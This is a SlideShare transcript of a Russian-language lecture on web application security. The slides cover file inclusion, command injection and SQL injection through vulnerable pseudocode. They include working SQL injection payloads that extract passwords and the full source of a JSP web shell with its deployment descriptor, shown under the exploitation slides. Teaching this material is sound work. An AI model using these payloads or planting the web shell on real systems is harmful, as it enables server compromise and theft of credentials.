• Like
Безопасность интернет-приложений осень 2013 лекция 3
Upcoming SlideShare
Loading in...5
×
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
102
On Slideshare
0
From Embeds
0
Number of Embeds
1

Actions

Shares
Downloads
6
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Гипотеза нет Проверка да Цель достигнута 2
  • 2. GET/POST – параметры File uploads Cookies Headers External sources 3
  • 3. - LFI/RFI Command injection SQL Injection Загрузка произвольного файла 4
  • 4. … Name = query; Print(LoadFile(Name)); … http://target.com?getfile=valid http://target.com?getfile=invalid 5
  • 5. http://target.com?getfile=index 6
  • 6. http://target.com?getfile=index http://target.com?getfile=target 7
  • 7. … Name = query + “.txt”; Print(LoadFile(Name)); … 8
  • 8. … Name = query + “.txt”; Print(LoadFile(Name)); … 9
  • 9. … Param = query; System(“ping –c 1 ”+param); … 10
  • 10. … Param = query; System(“ping –c 1 ”+param); … 11
  • 11. … Param = query; System(“ping –c 1 ”+param); … 12
  • 12. … Q = “select username from users where id=“ + req_id; print(db_query(Q)); … Detect: ‘ and 1=1 / ‘ and 1=0 ‘ and benchmark (9999999,md5(1)) Exploit: ‘ union select 1,2,3,4,5 from table2 – comment out http://target.com/?id=-1 union select password from users -- c select username from users where id=-1 union select password from users -- c 13
  • 13. Сканирование: 14
  • 14. Идентификация: 15
  • 15. Уязвимость: 16
  • 16. Уязвимость: 17
  • 17. Эксплуатация: 18
  • 18. cmd.jsp: <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<BR>"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %></pre></BODY></HTML> 19
  • 19. WEB-INF/web.xml: <?xml version="1.0" ?> <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4"> <servlet> <servlet-name>Command</servlet-name> <jsp-file>/cmd.jsp</jsp-file> </servlet> </web-app> 20
  • 20. Эксплуатация: 21
  • 21. Эксплуатация: 22
  • 22. Результат: 23